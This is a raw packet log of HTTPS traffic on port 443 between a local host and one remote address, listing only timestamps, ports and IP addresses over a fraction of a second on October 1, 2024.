Oct 1, 2024 15:52:11.953166008 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.953217030 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.953242064 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.953253984 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.953316927 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.976308107 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.976520061 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.976552963 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.976583004 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.976589918 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.976600885 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.976640940 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.976649046 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.976689100 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.977322102 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.977396965 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.977438927 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.977444887 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.982527018 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.982568979 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.982575893 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.987951040 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.987994909 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.988007069 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.993289948 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.993330002 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.993338108 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.998825073 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:11.998904943 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:11.998913050 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.002502918 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.002547979 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.002556086 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.007013083 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.007070065 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.007078886 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.011971951 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.012018919 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.012026072 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.016724110 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.016804934 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.016819000 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.021161079 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.021231890 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.021240950 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.025782108 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.025824070 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.025830984 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.030389071 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.030431032 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.030441999 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.034378052 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.034426928 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.034435034 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.038721085 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.038760900 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.038769960 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.042329073 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.042366982 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.042373896 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.042382956 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.042437077 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.046302080 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.051136971 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.051187992 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.051198006 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.053704977 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.053760052 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.053770065 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.057267904 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.057315111 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.057322979 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.067039967 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.067091942 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.067105055 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.067190886 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.067234039 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.067240953 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.067308903 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.067348003 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.067353964 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.068861961 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.068907022 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.068912983 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.071001053 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.071083069 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.071096897 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.071105003 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.071203947 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.072983027 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.075259924 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.075306892 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.075314045 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.077529907 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.077575922 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.077583075 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.079550982 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.079596043 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.079603910 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.081743002 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.081792116 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.081798077 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.083862066 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.083909035 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.083916903 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.086071968 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.086107016 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.086113930 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.088224888 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.088265896 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.088327885 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.088335037 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.089440107 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.090219975 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.093178988 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.093225002 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.093230963 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.094651937 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.094700098 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.094706059 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.097604990 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.097654104 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.097661018 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.098964930 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.099013090 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.099019051 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.102309942 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.102368116 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.102375031 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.103790045 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.103873968 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.103940964 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.103952885 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.106872082 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.107141018 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.107343912 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.107455015 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.107522964 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.107531071 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.110855103 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.112875938 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.113037109 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.113090038 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.113100052 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.116292953 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.116380930 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.116429090 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.116437912 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.116477013 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.116513968 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.116520882 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.118856907 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.120503902 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.120928049 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.120980978 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.120985031 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.124636889 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.124670029 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.124701977 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.124722958 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.124730110 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.124758959 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.124759912 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.124799013 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.124804974 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.128987074 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.129151106 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.129194975 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.129201889 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.130222082 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.130227089 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.132693052 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.132744074 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.132751942 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.132873058 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.133011103 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.133018017 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.136687994 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.136719942 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.136765957 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.136775017 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.137660980 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.137665987 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.141063929 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.141340971 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.141385078 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.141392946 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.144001961 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.144038916 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.144059896 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.144068956 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.144082069 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.145142078 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.145186901 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.145191908 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.147445917 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.147490025 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.147530079 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.147537947 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.147608995 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.147650003 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.147655964 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.147686958 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.157191038 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.157246113 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.157286882 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.157285929 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.157299995 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.157332897 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.157340050 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.157375097 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.157407999 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.157414913 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.158118963 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.158179045 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.158185959 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.158216953 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.158263922 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.158271074 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.158282995 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.158886909 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.158929110 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.158935070 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.159374952 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.159534931 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.159542084 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.161180019 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.161550999 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.161612034 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.161618948 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.161626101 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.161653042 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.163317919 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.163366079 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.163367033 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.163378954 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.163422108 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.165476084 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.167632103 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.167663097 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.167690039 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.167721987 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.167732954 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.167754889 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.172101021 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.172142982 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.172147989 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.172157049 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.172183990 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.172189951 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.172261953 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.172302961 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.172307968 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.178683043 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.178734064 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.178750038 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.178757906 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.178834915 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.178849936 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.178855896 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.178889990 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.178894997 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.185137033 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.185201883 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.185234070 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.185256004 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.185264111 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.185276031 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.189287901 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.189336061 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.189371109 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.189393044 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.189399004 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.189419985 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.189522982 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.189565897 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.189575911 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.189580917 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.189670086 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.197442055 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.197536945 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.197568893 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.197597980 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.197607040 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.197643995 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.197643995 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.197659969 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.197717905 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.201870918 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.202001095 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.202037096 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.202044010 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.202050924 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.202090979 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.202315092 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.210913897 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.210948944 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.210966110 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.210974932 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.211064100 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.211069107 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.211117029 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.211154938 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.211159945 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.215190887 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.215229988 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.215238094 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.215250969 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.215322971 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.215325117 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.215336084 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.215368986 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.215374947 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.223241091 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.223273993 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.223287106 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.223294020 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.223326921 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.223357916 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.223365068 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.223371029 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.223395109 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.227132082 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.227175951 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.227176905 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.227189064 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.227221966 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.227262974 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.227310896 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.227346897 CEST	49707	443	192.168.2.5	142.250.184.193
Oct 1, 2024 15:52:12.227355003 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.232501984 CEST	443	49707	142.250.184.193	192.168.2.5
Oct 1, 2024 15:52:12.232543945 CEST	49707	443	192.168.2.5	142.250.184.193
